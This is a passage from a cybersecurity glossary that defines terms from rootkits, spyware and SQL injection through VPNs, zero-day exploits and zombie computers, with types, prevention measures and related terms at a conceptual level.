• Crypto Ransomware: Encrypts files (most common)
• Locker Ransomware: Locks entire device
• Scareware: Fake warnings demanding payment
• Doxware/Leakware: Threatens to publish stolen data
• RaaS (Ransomware as a Service): Ransomware sold to affiliates

Attack Vectors: Phishing emails, exploit kits, RDP vulnerabilities, malicious downloads

Famous Examples: WannaCry, NotPetya, Ryuk, CryptoLocker

Prevention: Regular backups, email filtering, software updates, network segmentation, user training, disable RDP if not needed

Related Terms: Malware, Encryption, Backup, Phishing, Exploit Kit

Rootkit

Definition: Malicious software designed to gain privileged access to a computer while hiding its presence from users and security tools.

Detailed Explanation: Rootkits operate at low system levels, modifying operating system functions to conceal malicious activity. They're particularly dangerous because they're difficult to detect and remove.

Rootkit Types:

• User-mode Rootkits: Operate at application level
• Kernel-mode Rootkits: Operate at OS kernel level
• Bootkit: Loads before OS, extremely hard to detect
• Firmware Rootkit: Infects device firmware (BIOS, UEFI)
• Hypervisor Rootkit: Operates below OS using virtualization

Detection: Behavior analysis, memory dump analysis, integrity checking, specialized rootkit detection tools

Related Terms: Malware, Backdoor, Privilege Escalation, Firmware

Social Engineering

Definition: Psychological manipulation of people into performing actions or divulging confidential information, exploiting human trust rather than technical vulnerabilities.

Detailed Explanation: Social engineering is often the weakest link in security. Attackers exploit human psychology - trust, authority, urgency, fear - to bypass technical defenses entirely.

Common Techniques:

• Phishing: Fraudulent communications
• Pretexting: Creating fabricated scenarios
• Baiting: Offering something enticing (infected USB drives)
• Quid Pro Quo: Offering service in exchange for information
• Tailgating: Following authorized person into restricted area
• Impersonation: Posing as trusted authority

Psychological Principles Exploited: Authority, urgency, scarcity, trust, fear, reciprocity

Defense: Security awareness training, verification procedures, clear security policies, healthy skepticism

Related Terms: Phishing, Pretexting, Human Hacking, Security Awareness

Spyware

Definition: Malicious software that secretly monitors and collects information about users' activities without their knowledge or consent.

Detailed Explanation: Spyware operates covertly to gather sensitive information including browsing habits, keystrokes, login credentials, financial data, and personal communications. It can severely impact system performance and user privacy.

Types of Spyware:

• Keyloggers: Record keystrokes
• Screen Scrapers: Capture screenshot
• Adware: Tracks browsing for advertising
• Tracking Cookies: Monitor web activity
• System Monitors: Log system activities
• Infostealers: Collect and exfiltrate sensitive data

Detection: Unusual system performance, unexpected pop-ups, changed settings, anti-spyware software

Related Terms: Keylogger, Malware, Privacy, Surveillance, Trojan

SQL Injection

Definition: A code injection attack that exploits vulnerabilities in database-driven applications by inserting malicious SQL statements into input fields.

Detailed Explanation: SQL injection allows attackers to interfere with database queries, potentially reading sensitive data, modifying database content, or executing administrative operations. It's one of the most common web application vulnerabilities.

Attack Types:

• In-band SQL Injection: Same channel for attack and results
• Blind SQL Injection: No direct output, infer results from behavior
• Out-of-band SQL Injection: Uses different channels

Impact: Data theft, authentication bypass, data modification, database server compromise

Prevention: Parameterized queries (prepared statements), input validation, least privilege database accounts, WAF, stored procedures

Related Terms: Web Application Security, Input Validation, Database Security, Code Injection

SSL/TLS (Secure Sockets Layer / Transport Layer Security)

Definition: Cryptographic protocols providing secure communications over computer networks, primarily used for HTTPS web traffic.

Detailed Explanation: SSL is the predecessor to TLS. Both provide encryption, authentication, and data integrity for internet communications. TLS 1.2 and 1.3 are current standards; SSL is deprecated due to vulnerabilities.

Functions:

• Encryption: Protects data confidentiality
• Authentication: Verifies server (and optionally client) identity
• Integrity: Detects message tampering

TLS Handshake Process: Client hello, server hello, certificate exchange, key exchange, session established

Applications: HTTPS websites, email (SMTPS, IMAPS), VPN, file transfer (FTPS)

Related Terms: HTTPS, Digital Certificate, Encryption, Public Key Infrastructure

Tor (The Onion Router)

Definition: An anonymity network that encrypts and routes internet traffic through multiple relay servers to conceal user location and usage from surveillance or traffic analysis.

Detailed Explanation: Tor provides privacy and anonymity by routing traffic through at least three randomly selected nodes, with each layer encrypted (like an onion). No single node knows both the source and destination.

How It Works:

• User connects to entry node (guard)
• Traffic passes through middle relay(s)
• Exit node connects to final destination
• Each layer of encryption is removed at each hop

Legitimate Uses: Privacy protection, censorship circumvention, whistleblowing, journalism, activism

Concerns: Can be used for illegal activities, exit nodes can monitor unencrypted traffic

Related Terms: Anonymity, VPN, Dark Web, Privacy, Encryption

Trojan Horse

Definition: Malicious software disguised as legitimate or benign programs that performs harmful actions once installed.

Detailed Explanation: Named after the Greek mythological wooden horse, Trojans deceive users into installing them by appearing useful or harmless. Unlike viruses, they don't self-replicate.

Common Types:

• Backdoor Trojans: Provide remote access
• Banking Trojans: Steal financial credentials
• Downloader Trojans: Download additional malware
• Ransomware Trojans: Encrypt files for ransom
• RAT (Remote Access Trojan): Enable full remote control
• Infostealer Trojans: Harvest sensitive information

Distribution: Software downloads, email attachments, fake updates, infected USB drives

Related Terms: Malware, RAT, Backdoor, Social Engineering

Two-Factor Authentication (2FA)

Definition: A security mechanism requiring users to provide two different authentication factors to verify their identity.

Detailed Explanation: 2FA is a subset of Multi-Factor Authentication (MFA), specifically requiring exactly two factors. It significantly reduces risk of unauthorized access even if one factor (typically password) is compromised.

Common 2FA Methods:

• SMS OTP: Code sent via text message (less secure)
• Authenticator Apps: TOTP codes (Google Authenticator, Authy)
• Hardware Tokens: Physical devices generating codes (YubiKey)
• Push Notifications: Approve/deny requests on mobile app
• Biometrics + Password: Fingerprint or face recognition

Benefits: Stronger security than passwords alone, protects against phishing and credential stuffing

Related Terms: Multi-Factor Authentication (MFA), One-Time Password (OTP), Authentication, TOTP

User Access Control (UAC)

Definition: A Windows security feature that helps prevent unauthorized changes to the operating system by prompting for permission or administrator credentials.

Detailed Explanation: UAC creates a barrier between standard user operations and administrative tasks, requiring explicit consent for privileged actions. This limits malware damage by preventing unauthorized system changes.

Protection Mechanisms:

• Prompts for elevation when administrative access needed
• Runs applications with standard user privileges by default
• Secure desktop for credential input
• File and registry virtualization

Related Terms: Privilege Escalation, Least Privilege, Access Control, Windows Security

Virus

Definition: A type of malicious software that replicates by inserting copies of itself into other programs, files, or boot sectors, typically requiring user action to spread.

Detailed Explanation: Viruses attach themselves to host files and execute when the host is run. They can corrupt or delete data, consume system resources, or provide backdoor access to attackers.

Virus Types:

• File Infector: Attaches to executable files
• Boot Sector: Infects master boot record
• Macro Virus: Embedded in documents (Word, Excel)
• Polymorphic: Changes code to evade detection
• Metamorphic: Rewrites itself completely
• Multipartite: Infects multiple targets

Distinction from Worms: Viruses require host file and user action to spread; worms self-propagate

Related Terms: Malware, Worm, Antivirus, Infection Vector

VPN (Virtual Private Network)

Definition: A technology that creates a secure, encrypted connection over a less secure network (like the internet), extending a private network across a public network.

Detailed Explanation: VPNs encrypt all traffic between user device and VPN server, hiding IP address and protecting data from eavesdropping. They're essential for remote work and privacy protection.

VPN Types:

• Remote Access VPN: Connects individual users to private network
• Site-to-Site VPN: Connects entire networks together
• SSL VPN: Browser-based, no client software needed
• IPsec VPN: Network-layer encryption

Uses: Remote work, privacy protection, bypassing geo-restrictions, securing public Wi-Fi

Protocols: OpenVPN, WireGuard, IKEv2/IPsec, L2TP/IPsec, PPTP (deprecated)

Related Terms: Encryption, Tunneling, Remote Access, Network Security

Vulnerability

Definition: A weakness or flaw in a system, application, or network that can be exploited by threats to gain unauthorized access or cause harm.

Detailed Explanation: Vulnerabilities can exist in software code, system configurations, security controls, or procedures. They represent potential entry points for attackers.

Vulnerability Types:

• Software Bugs: Coding errors, buffer overflows, race conditions
• Misconfigurations: Weak settings, default credentials
• Design Flaws: Architectural weaknesses
• Missing Updates: Unpatched known vulnerabilities
• Social Engineering: Human factors

Severity Ratings: CVSS (Common Vulnerability Scoring System) rates from 0-10

Management: Vulnerability scanning, patch management, security testing, risk assessment

Related Terms: Exploit, Patch, Zero-day, CVE (Common Vulnerabilities and Exposures)

Worm

Definition: A self-replicating malware that spreads across networks automatically without requiring user action or host files.

Detailed Explanation: Unlike viruses, worms are standalone programs that propagate independently, often exploiting network vulnerabilities. They can spread rapidly across networks, consuming bandwidth and system resources.

Characteristics:

• Self-contained executable programs
• Automatic propagation without human intervention
• Can spread across networks rapidly
• Often exploit specific vulnerabilities
• Can carry additional payloads (ransomware, backdoors)

Famous Examples: Morris Worm (1988), ILOVEYOU, Conficker, WannaCry (crypto-worm)

Prevention: Network segmentation, patch management, firewalls, IDS/IPS, disabling unnecessary services

Related Terms: Malware, Virus, Network Security, Exploit, Patch Management

XSS (Cross-Site Scripting)

Definition: See Cross-Site Scripting in section C for detailed explanation.

Quick Reference: Web vulnerability allowing attackers to inject malicious scripts into trusted websites, executing in victims' browsers.

Related Terms: Web Application Security, SQL Injection, Input Validation, CSRF

Yellow Team

Definition: In cybersecurity exercises, the team responsible for building and managing the infrastructure, scenarios, and technical environment for Red Team (attackers) and Blue Team (defenders) exercises.

Detailed Explanation: Yellow Teams ensure exercises run smoothly, manage the test environment, track activities, and help evaluate both Red and Blue team performance without interfering with the simulation.

Responsibilities: Environment setup, scenario development, monitoring, scoring, technical support, post-exercise analysis

Related Terms: Red Team, Blue Team, Purple Team, Penetration Testing

Zero-Day Exploit

Definition: An attack that exploits a previously unknown vulnerability in software or hardware, occurring on the same day the vulnerability becomes known to the vendor ("zero days" to fix).

Detailed Explanation: Zero-day exploits are extremely dangerous because no patch exists yet. They're highly valued in underground markets and used in APT attacks and cyber warfare.

Lifecycle:

• Day Zero: Vulnerability discovered (possibly used without vendor knowledge)
• Discovery: Vendor or security researchers become aware
• Disclosure: Vulnerability publicly disclosed (responsible or not)
• Patch Development: Vendor creates fix
• Patch Release: Fix becomes available
• Deployment: Users apply patches

Impact: High value to attackers, difficult to defend against, can affect millions of users

Defense: Defense-in-depth, anomaly detection, sandboxing, limiting privileges, rapid patch deployment

Related Terms: Vulnerability, Exploit, Patch, APT, Responsible Disclosure

Zero Trust Architecture

Definition: A security model that requires strict verification for every person and device trying to access resources, regardless of whether they're inside or outside the network perimeter.

Detailed Explanation: Zero Trust assumes no implicit trust based on network location. It applies the principle "never trust, always verify" to all access requests, continuously validating security posture.

Core Principles:

• Verify Explicitly: Always authenticate and authorize
• Least Privilege Access: Limit access to minimum necessary
• Assume Breach: Design with assumption of compromise
• Microsegmentation: Segment access by workload
• Continuous Monitoring: Constantly assess security posture

Implementation: Identity and access management (IAM), microsegmentation, encryption, analytics, automation

Benefits: Reduces breach impact, supports remote work, improves visibility, adaptive security

Related Terms: Network Segmentation, IAM, Least Privilege, Microsegmentation, Perimeter Security

Zombie Computer

Definition: A computer that has been infected with malware and is controlled remotely by an attacker, often as part of a botnet, without the owner's knowledge.

Detailed Explanation: Zombie computers (or "bots") are compromised systems used collectively in botnets for malicious activities. Owners typically don't know their devices are infected and being used for attacks.

Common Uses:

• DDoS attacks
• Spam distribution
• Cryptocurrency mining
• Credential stuffing
• Click fraud

Signs of Infection: Slow performance, high network activity, unexpected CPU usage, frequent crashes

Prevention: Antivirus software, firewalls, regular updates, safe browsing practices

Related Terms: Botnet, Command and Control (C2), DDoS, Malware